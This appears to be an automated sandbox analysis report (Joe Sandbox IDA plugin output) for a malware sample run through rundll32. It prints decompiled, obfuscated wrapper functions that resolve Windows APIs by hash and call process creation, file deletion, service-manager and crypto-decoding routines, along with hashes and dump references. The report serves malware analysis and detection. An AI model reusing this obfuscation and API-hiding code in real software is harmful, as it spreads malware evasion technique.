Associated: 0000000E.00000002.2104363064.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2104409064.000000000022F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: ,.
API String ID: 3098006287-263192673
Opcode ID: 47688d64d3b0e0483b819327fb3ad2d4dd2b99bd4eab320a8e24d3c64762cb4c
Instruction ID: 2dce763bc741b1c3ea335d74a995d5d108098ad312ba2f87c55291a0dfee2bf7
Opcode Fuzzy Hash: 47688d64d3b0e0483b819327fb3ad2d4dd2b99bd4eab320a8e24d3c64762cb4c
Instruction Fuzzy Hash: 9E1107B6D0020DFFEF01DFD4C94A8AEBBB1FB14304F508188E91566261D3B58B649F91

Uniqueness

Uniqueness Score: -1.00%

Function 00227998, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 28%

			E00227998(void* __ecx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __edx;
				void* _t42;
				struct HINSTANCE__* _t49;
				void* _t52;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0021E171(_t42);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x25d38;
				_v20 = 0x510f;
				_v20 = _v20 >> 8;
				_v20 = _v20 ^ 0x00005672;
				_v16 = 0xf8b1;
				_v16 = _v16 + 0xffff15e9;
				_v16 = _v16 + 0xffffcd36;
				_v16 = _v16 ^ 0xffff83d2;
				_v12 = 0x4d1a;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000018af;
				_v8 = 0x7f5d;
				_v8 = _v8 ^ 0x2c3d59fe;
				_v8 = _v8 + 0x58d2;
				_v8 = _v8 << 0xe;
				_v8 = _v8 ^ 0x5fdd21ae;
				_push(0x811bfff3);
				_push(0xb6b01ae5);
				_t52 = 0x55;
				E0021606F(_t52);
				_t49 = LoadLibraryW(_a12); // executed
				return _t49;
			}

0x0022799e
0x002279a1
0x002279a4
0x002279a9
0x002279ae
0x002279b5
0x002279bc
0x002279c3
0x002279c7
0x002279ce
0x002279d5
0x002279dc
0x002279e3
0x002279ea
0x002279f1
0x002279f5
0x002279f9
0x002279fd
0x00227a04
0x00227a0b
0x00227a12
0x00227a19
0x00227a1d
0x00227a30
0x00227a37
0x00227a3e
0x00227a3f
0x00227a4a
0x00227a4f

APIs

LoadLibraryW.KERNEL32(00005672,?,?,?,?,?,?,?,?,38246A1A), ref: 00227A4A

Strings

rV, xrefs: 002279C7

Memory Dump Source

Source File: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000E.00000002.2104363064.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2104409064.000000000022F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: rV
API String ID: 1029625771-3738762570
Opcode ID: 6c2337c38b901229c7e322e5f1d9b1029b3c9dada85b33bca72088930e709091
Instruction ID: 466403e5f67629e2214015e29c56c9da34cf03c21596671ee409a064801a9ec0
Opcode Fuzzy Hash: 6c2337c38b901229c7e322e5f1d9b1029b3c9dada85b33bca72088930e709091
Instruction Fuzzy Hash: D31107B6D1160DFBDB14DFE4CC4A4DEBBB4FB10309F608588E92566250D3B44B549F90

Uniqueness

Uniqueness Score: -1.00%

Function 0022C7C3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E0022C7C3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t44;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x43a94f;
				_v32 = 0x1049b9;
				_v28 = 0x3eaad4;
				_v20 = 0xf167;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x00002afd;
				_v12 = 0xf1a2;
				_v12 = _v12 + 0xb8a5;
				_v12 = _v12 | 0x0ef61b66;
				_v12 = _v12 ^ 0xe07f37e9;
				_v12 = _v12 ^ 0xee88d275;
				_v8 = 0xe943;
				_v8 = _v8 + 0xe3dd;
				_v8 = _v8 | 0x8abcb7de;
				_v8 = _v8 + 0xffff75bb;
				_v8 = _v8 ^ 0x8abd009e;
				_v16 = 0x92be;
				_v16 = _v16 + 0xa80e;
				_v16 = _v16 ^ 0x00014c59;
				_push(0xec5aa560);
				_push(_t43);
				_push(0xb6b01ae5);
				_t44 = 0x2d;
				E0021606F(_t44);
				ExitProcess(0);
			}

0x0022c7c9
0x0022c7cd
0x0022c7d4
0x0022c7db
0x0022c7e2
0x0022c7e9
0x0022c7ed
0x0022c7f4
0x0022c7fb
0x0022c802
0x0022c809
0x0022c810
0x0022c817
0x0022c81e
0x0022c825
0x0022c82c
0x0022c833
0x0022c83b
0x0022c842
0x0022c849
0x0022c85c
0x0022c862
0x0022c863
0x0022c86a
0x0022c86b
0x0022c875

APIs

ExitProcess.KERNELBASE(00000000), ref: 0022C875

Strings

C, xrefs: 0022C817

Memory Dump Source

Source File: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000E.00000002.2104363064.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2104409064.000000000022F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: C
API String ID: 621844428-3705061908
Opcode ID: 5166b79bcc50a558bfb193a34fc174177961b77d3bd12aa0b8ebd5d1b0848ce2
Instruction ID: 032b0353b8d4261a4caedbdc45cbcc9327fe5819217c3b5667740c2263ac28d4
Opcode Fuzzy Hash: 5166b79bcc50a558bfb193a34fc174177961b77d3bd12aa0b8ebd5d1b0848ce2
Instruction Fuzzy Hash: D3111CB5D0131DEBEB44CFE5D94A5EEBBB0FB14318F108189D51176291D3B85B489F81

Uniqueness

Uniqueness Score: -1.00%

Function 00220DE5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E00220DE5(void* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edx;
				void* _t41;
				int _t53;
				signed int _t55;
				void* _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0021E171(_t41);
				_v8 = 0x13b8;
				_v8 = _v8 + 0x3dca;
				_v8 = _v8 | 0xf08d47e2;
				_t55 = 0x6c;
				_v8 = _v8 * 0x4b;
				_v8 = _v8 ^ 0x7968eec6;
				_v20 = 0x39de;
				_push(0x457707f1);
				_v20 = _v20 / _t55;
				_v20 = _v20 ^ 0x00003bca;
				_v16 = 0x3217;
				_push(_t55);
				_push(_t55);
				_push(0xb6b01ae5);
				_v16 = _v16 * 0x55;
				_v16 = _v16 | 0x68e2e048;
				_v16 = _v16 ^ 0x68f2fb55;
				_v12 = 0x5ca5;
				_v12 = _v12 | 0x2e6919c4;
				_t59 = 0x3f;
				_v12 = _v12 * 0x2e;
				_v12 = _v12 ^ 0x56eeeba3;
				E0021606F(_t59);
				_t53 = CloseHandle(_a8); // executed
				return _t53;
			}

0x00220deb
0x00220dee
0x00220df1
0x00220df6
0x00220dfb
0x00220e04
0x00220e0b
0x00220e18
0x00220e1c
0x00220e1f
0x00220e26
0x00220e32
0x00220e37
0x00220e3a
0x00220e41
0x00220e4c
0x00220e4d
0x00220e4e
0x00220e55
0x00220e58
0x00220e5f
0x00220e66
0x00220e6d
0x00220e78
0x00220e79
0x00220e7c
0x00220e8f
0x00220e9a
0x00220e9f

APIs

CloseHandle.KERNELBASE(68F2FB55,?,?,?,?,?,?,?,?,00000000), ref: 00220E9A

Strings

Hh, xrefs: 00220E58

Memory Dump Source

Source File: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000E.00000002.2104363064.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2104409064.000000000022F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: Hh
API String ID: 2962429428-996502550
Opcode ID: e7d45c783abdec88297e9039aa05dbf03639c62c0080e51466ba891bf10a3185
Instruction ID: 23debb53b9a3f1bf253329e25dc08c2e598212a0d5617749e45401b133b2b989
Opcode Fuzzy Hash: e7d45c783abdec88297e9039aa05dbf03639c62c0080e51466ba891bf10a3185
Instruction Fuzzy Hash: 3E110374D0020DEBEF05DFA8C9469AEBFB5EB40304F60C599E924AB261D3B95B518F40

Uniqueness

Uniqueness Score: -1.00%

Function 00228409, Relevance: 1.6, APIs: 1, Instructions: 80
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00228409(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a40, long _a44, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t57;
				void* _t72;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				long _t86;

				_push(_a48);
				_t86 = __edx;
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0021E171(_t57);
				_v28 = 0x3438bc;
				_v24 = 0;
				_v12 = 0xcb52;
				_t74 = 0xd;
				_v12 = _v12 * 0x44;
				_v12 = _v12 * 0x51;
				_v12 = _v12 ^ 0x1116e99e;
				_v20 = 0x8d1c;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x00234fd5;
				_v8 = 0x5991;
				_t75 = 0x12;
				_v8 = _v8 / _t74;
				_v8 = _v8 / _t75;
				_v8 = _v8 ^ 0x00000693;
				_v16 = 0xdaea;
				_t76 = 0x6e;
				_v16 = _v16 / _t76;
				_v16 = _v16 ^ 0x00006144;
				E0021606F(0x128, 0xb6b01ae5, _t76, _t76, 0xd3c406ee);
				_t72 = CreateFileW(_a40, _a44, _a32, 0, _a8, _t86, 0); // executed
				return _t72;
			}

0x00228411
0x00228416
0x00228418
0x0022841b
0x0022841e
0x0022841f
0x00228422
0x00228425
0x00228428
0x0022842b
0x0022842c
0x0022842f
0x00228432
0x00228435
0x00228437
0x0022843c
0x00228445
0x00228448
0x00228455
0x00228458
0x0022845f
0x00228462
0x00228469
0x00228470
0x00228474
0x0022847b
0x00228487
0x00228488
0x00228494
0x00228499
0x002284a0
0x002284aa
0x002284b5
0x002284b8
0x002284d7
0x002284ee
0x002284f5

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00006144,?,00000000), ref: 002284EE

Memory Dump Source

Source File: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000E.00000002.2104363064.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2104409064.000000000022F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d4659c096c709fa19e878a53af5a36d243dcc7bf27e5cf64b735575a0ea006bd
Instruction ID: ed33ce06f3ce5483a05a40222ce2b993d8e39cd9c28065f56931b54a14a74419
Opcode Fuzzy Hash: d4659c096c709fa19e878a53af5a36d243dcc7bf27e5cf64b735575a0ea006bd
Instruction Fuzzy Hash: DA310672901208FBDF05DF95CD098DEBFB6FF88304F108199F914A6250D7B69A60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00228165, Relevance: 1.6, APIs: 1, Instructions: 78
processCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E00228165(WCHAR* __ecx, WCHAR* __edx, intOrPtr _a4, struct _STARTUPINFOW* _a8, int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _PROCESS_INFORMATION* _a44, intOrPtr _a48, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t47;
				int _t58;
				signed int _t61;
				void* _t65;
				WCHAR* _t66;
				WCHAR* _t67;

				_push(_a56);
				_t67 = __edx;
				_push(0);
				_push(_a48);
				_t66 = __ecx;
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021E171(_t47);
				_v16 = 0xa2fc;
				_v16 = _v16 >> 5;
				_v16 = _v16 + 0xffff1f57;
				_v16 = _v16 ^ 0xffff035a;
				_v12 = 0x8842;
				_t61 = 0xc;
				_v12 = _v12 * 0xd;
				_push(0xd8c5ba15);
				_v12 = _v12 / _t61;
				_v12 = _v12 ^ 0x0000f812;
				_v20 = 0x5415;
				_push(_t61);
				_push(_t61);
				_push(0xb6b01ae5);
				_v20 = _v20 * 0x5b;
				_v20 = _v20 ^ 0x001da8a2;
				_v8 = 0xf8b5;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x80bbebc5;
				_v8 = _v8 ^ 0x80bbcffb;
				_t65 = 0x47;
				E0021606F(_t65);
				_t58 = CreateProcessW(_t66, _t67, 0, 0, _a20, 0, 0, 0, _a8, _a44); // executed
				return _t58;
			}

0x0022816e
0x00228173
0x00228175
0x00228176
0x00228179
0x0022817b
0x0022817e
0x0022817f
0x00228182
0x00228183
0x00228186
0x00228189
0x0022818c
0x0022818d
0x0022818e
0x00228191
0x00228194
0x00228195
0x00228196
0x0022819b
0x002281a4
0x002281a8
0x002281af
0x002281b6
0x002281c3
0x002281c7
0x002281cf
0x002281d4
0x002281d7
0x002281de
0x002281e9
0x002281ea
0x002281eb
0x002281f2
0x002281f5
0x002281fc
0x00228203
0x00228207
0x0022820e
0x00228221
0x00228222
0x0022823a
0x00228242

APIs

CreateProcessW.KERNEL32(0BF52F2F,00000000,00000000,00000000,00000044,00000000,00000000,00000000,FFFF035A,?), ref: 0022823A

Memory Dump Source

Source File: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000E.00000002.2104363064.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2104409064.000000000022F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b05528a14ea75ef9fb60441011f302ef31ff4d999b6e7fcdadd2a509598f610b
Instruction ID: bb799cce6a9625a603f0bbd32f03b5779c2feca8786cb7e92e334b8b6773c5c2
Opcode Fuzzy Hash: b05528a14ea75ef9fb60441011f302ef31ff4d999b6e7fcdadd2a509598f610b
Instruction Fuzzy Hash: A521E3B290020DBFEF058E94CC86CEEBFB9FB44358F408198F91466260D3759A519B90

Uniqueness

Uniqueness Score: -1.00%

Function 002194A3, Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E002194A3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				intOrPtr* _t50;
				void* _t51;
				signed int _t53;
				void* _t58;
				void* _t59;

				_t59 = __edx;
				_t58 = __ecx;
				E0021E171(_t40);
				_v20 = 0xa96c;
				_v20 = _v20 ^ 0xdb4b0424;
				_v20 = _v20 ^ 0xdb4b8f37;
				_v8 = 0xec5f;
				_t53 = 0x33;
				_v8 = _v8 * 0x67;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 | 0x13f5ff17;
				_v8 = _v8 ^ 0x13f5eace;
				_v16 = 0x37e2;
				_v16 = _v16 * 0x6f;
				_v16 = _v16 ^ 0x001836ab;
				_v12 = 0x82bd;
				_v12 = _v12 >> 4;
				_t32 = _t53 + 0x5f; // 0x92
				_v12 = _v12 / _t53;
				_v12 = _v12 ^ 0x00002d3b;
				_t50 = E0021606F(_t32, 0xb6b01ae5, _t53, _t53, 0x2e5d2a1c);
				_t51 =  *_t50(_t58, 0, _t59, 0x28, __ecx, __edx, _a4, 0, 0x28, _a16, _a20, _a24); // executed
				return _t51;
			}

0x002194ae
0x002194b0
0x002194c1
0x002194c6
0x002194cf
0x002194d6
0x002194dd
0x002194ea
0x002194ee
0x002194f1
0x002194f5
0x002194fc
0x00219503
0x0021951a
0x0021951d
0x00219524
0x0021952b
0x00219534
0x00219537
0x0021953a
0x0021954d
0x0021955b
0x00219562

APIs

SetFileInformationByHandle.KERNELBASE(6EE5A95E,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0021955B

Memory Dump Source

Source File: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000E.00000002.2104363064.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2104409064.000000000022F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: baafaaa223f7f5a2fc0b958a68d71a7890cb0828c43d606bc6318d468937fe4b
Instruction ID: c3bec51bf0ff25cb8c97a1070aa34fbe1120b9674af753f89308032f7cee5909
Opcode Fuzzy Hash: baafaaa223f7f5a2fc0b958a68d71a7890cb0828c43d606bc6318d468937fe4b
Instruction Fuzzy Hash: 1F215675E01208FBEB18DFA5C94AADEBFB5EB44304F108099F814AB291D3B45B15DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00218289, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00218289(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t39;
				int _t49;
				signed int _t51;

				_push(_a4);
				E0021E171(_t39);
				_v36 = 0x41b5b5;
				asm("stosd");
				_t51 = 0x3d;
				asm("stosd");
				asm("stosd");
				_v12 = 0x9aa2;
				_v12 = _v12 + 0x23f6;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x00001b6c;
				_v20 = 0x293c;
				_v20 = _v20 + 0xffff17af;
				_v20 = _v20 ^ 0xffff269b;
				_v16 = 0x3622;
				_v16 = _v16 | 0x78a52f71;
				_v16 = _v16 ^ 0x78a543e8;
				_v8 = 0x2f22;
				_v8 = _v8 + 0x35c7;
				_v8 = _v8 >> 2;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0000117e;
				E0021606F(0x314, 0xb6b01ae5, _t51, _t51, 0x1b106d81);
				_t49 = DeleteFileW(_a4); // executed
				return _t49;
			}

0x00218290
0x00218295
0x0021829a
0x002182a8
0x002182ab
0x002182af
0x002182b5
0x002182b6
0x002182bd
0x002182c4
0x002182c8
0x002182cf
0x002182d6
0x002182dd
0x002182e4
0x002182eb
0x002182f2
0x002182f9
0x00218300
0x00218307
0x00218311
0x00218319
0x00218332
0x0021833d
0x00218343

APIs

DeleteFileW.KERNELBASE(00001B6C,?,?,?,?,?,?,00000000), ref: 0021833D

Memory Dump Source

Source File: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000E.00000002.2104363064.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2104409064.000000000022F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 068c8ad58f972a258c528a11afa709a8a7f7370e1a23e16540f0ab729b5d3cce
Instruction ID: 3b7ce091b1c3b883c4f7061169570dbdf469e2753ea82038d50f692c5f1e54f2
Opcode Fuzzy Hash: 068c8ad58f972a258c528a11afa709a8a7f7370e1a23e16540f0ab729b5d3cce
Instruction Fuzzy Hash: 03115B75E0120CFBEB08DFE9CC4A4DEBBB5FB58304F108188E410A6264D3B84B598F90

Uniqueness

Uniqueness Score: -1.00%

Function 00213296, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00213296(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t40;
				int _t49;
				signed int _t51;
				struct _SHFILEOPSTRUCTW* _t56;

				_push(_a4);
				_t56 = __ecx;
				_push(__ecx);
				E0021E171(_t40);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x1409b1;
				_v32 = 0x71de97;
				_v20 = 0x10af;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0x000096e0;
				_v12 = 0xfce5;
				_v12 = _v12 ^ 0x58bbe0cf;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x02c5a2c7;
				_v16 = 0xf79b;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00000fb9;
				_v8 = 0xa9b8;
				_v8 = _v8 ^ 0x8b980f22;
				_t51 = 0xc;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0ba20c7c;
				E0021606F(0x21a, 0xf44a99f2, _t51, _t51, 0x438313f0);
				_t49 = SHFileOperationW(_t56); // executed
				return _t49;
			}

0x0021329d
0x002132a0
0x002132a3
0x002132a4
0x002132a9
0x002132af
0x002132b3
0x002132ba
0x002132c1
0x002132c8
0x002132cc
0x002132d3
0x002132da
0x002132e1
0x002132e5
0x002132ec
0x002132f3
0x002132f7
0x002132fe
0x00213305
0x00213311
0x0021331c
0x0021331f
0x0021333e
0x00213347
0x0021334d

APIs

SHFileOperationW.SHELL32 ref: 00213347

Memory Dump Source

Source File: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000E.00000002.2104363064.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2104409064.000000000022F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 4e58339be104edb10afeac2e85769c6a1b22744e76ddd0819eceb4ac5dedda93
Instruction ID: 27e8e0ca951d334f6e5741292bcf39c8f200573cd5c9f7e82ef6c9ee47928da8
Opcode Fuzzy Hash: 4e58339be104edb10afeac2e85769c6a1b22744e76ddd0819eceb4ac5dedda93
Instruction Fuzzy Hash: CE111671D10219EBEB14DFE4C94AAEEBBB5EB44308F108199E814A7251C3B91B488F91

Uniqueness

Uniqueness Score: -1.00%

Function 00229EEB, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00229EEB(void* __ecx, void* __edx, int _a4, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t33;
				void* _t41;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E0021E171(_t33);
				_v36 = 0x1a5225;
				_v32 = 0x6186e9;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0x159f;
				_v20 = _v20 ^ 0xd8eb5afd;
				_v20 = _v20 ^ 0xd8eb17ca;
				_v16 = 0xd686;
				_v16 = _v16 * 0x29;
				_v16 = _v16 ^ 0x00226c98;
				_v12 = 0xd637;
				_v12 = _v12 | 0x41a2b1c9;
				_v12 = _v12 ^ 0x41a2fe45;
				_v8 = 0x7ffa;
				_v8 = _v8 | 0xd8d6b90f;
				_v8 = _v8 ^ 0xd8d6edd8;
				E0021606F(0x1ec, 0xbee648b, __ecx, __ecx, 0x6c130eb5);
				_t41 = OpenSCManagerW(0, 0, _a4); // executed
				return _t41;
			}

0x00229ef2
0x00229ef7
0x00229efa
0x00229efb
0x00229eff
0x00229f00
0x00229f05
0x00229f0f
0x00229f1b
0x00229f1e
0x00229f21
0x00229f28
0x00229f2f
0x00229f36
0x00229f4d
0x00229f50
0x00229f57
0x00229f5e
0x00229f65
0x00229f6c
0x00229f73
0x00229f7a
0x00229f8d
0x00229f9a
0x00229fa0

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,41A2FE45,?,?,?,?,?,?,?,?,00225A72,0000B2BF), ref: 00229F9A

Memory Dump Source

Source File: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000E.00000002.2104363064.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2104409064.000000000022F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 53ec5c0606a994eb95c08fd96e75b2b2180dfb57eb41605714a3daa805ae5c75
Instruction ID: dbea7e6369749829720e459cbebfcbd7558933d24c519a2607be37965eaff5e6
Opcode Fuzzy Hash: 53ec5c0606a994eb95c08fd96e75b2b2180dfb57eb41605714a3daa805ae5c75
Instruction Fuzzy Hash: 9A11F0B5D0122DABDB04DFE9C84A9EEBFB4EF09344F108189E815A6250D3B45B608FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2244 Parent PID: 3056 rundll32.exeCOMMON

Executed Functions

Function 002EA69B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E002EA69B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t50;
				intOrPtr* _t58;
				void* _t59;

				E002DE171(_t50);
				_v12 = 0xdc7;
				_v12 = _v12 << 3;
				_v12 = _v12 + 0xffff7166;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0xfffd885e;
				_v8 = 0xa55a;
				_v8 = _v8 + 0x7cb5;
				_v8 = _v8 | 0xc394f0a6;
				_v8 = _v8 * 0x73;
				_v8 = _v8 ^ 0xdc5c065a;
				_v20 = 0x4a36;
				_v20 = _v20 >> 0xa;
				_v20 = _v20 ^ 0x00005c2f;
				_v16 = 0xe0c4;
				_v16 = _v16 * 0x3f;
				_v16 = _v16 ^ 0x0037356f;
				_t58 = E002D606F(0x10b, 0x3532ca74, __ecx, __ecx, 0xbb4c4a3f);
				_t59 =  *_t58(_a36, _a40, _a16, _a8, _a20, 0, _a24, _a4, __ecx, __edx, _a4, _a8, _a12, _a16, _a20, _a24, 0, _a32, _a36, _a40, _a44); // executed
				return _t59;
			}

0x002ea6c3
0x002ea6c8
0x002ea6d2
0x002ea6db
0x002ea6e2
0x002ea6e6
0x002ea6ed
0x002ea6f4
0x002ea6fb
0x002ea712
0x002ea715
0x002ea71c
0x002ea723
0x002ea727
0x002ea72e
0x002ea739
0x002ea73c
0x002ea74f
0x002ea76e
0x002ea773

APIs

CryptDecodeObjectEx.CRYPT32(?,?,?,0037356F,?,00000000,?,FFFD885E), ref: 002EA76E

Strings

o57, xrefs: 002EA73C

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: CryptDecodeObject
String ID: o57
API String ID: 1207547050-2789618358
Opcode ID: 1dcc64bf293a1b605633b1802805251653327ff0236608ceb7b8819db60c0bd6
Instruction ID: 4ed798b72738502f50759f5cd402c3fe84e83ca040ea38d06afb90e5e4608c4b
Opcode Fuzzy Hash: 1dcc64bf293a1b605633b1802805251653327ff0236608ceb7b8819db60c0bd6
Instruction Fuzzy Hash: 20219E7690020DFBDF06DFA4CD46ADEBBB6FB08304F108588F92566260D3769A64EF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E75F0, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 25%

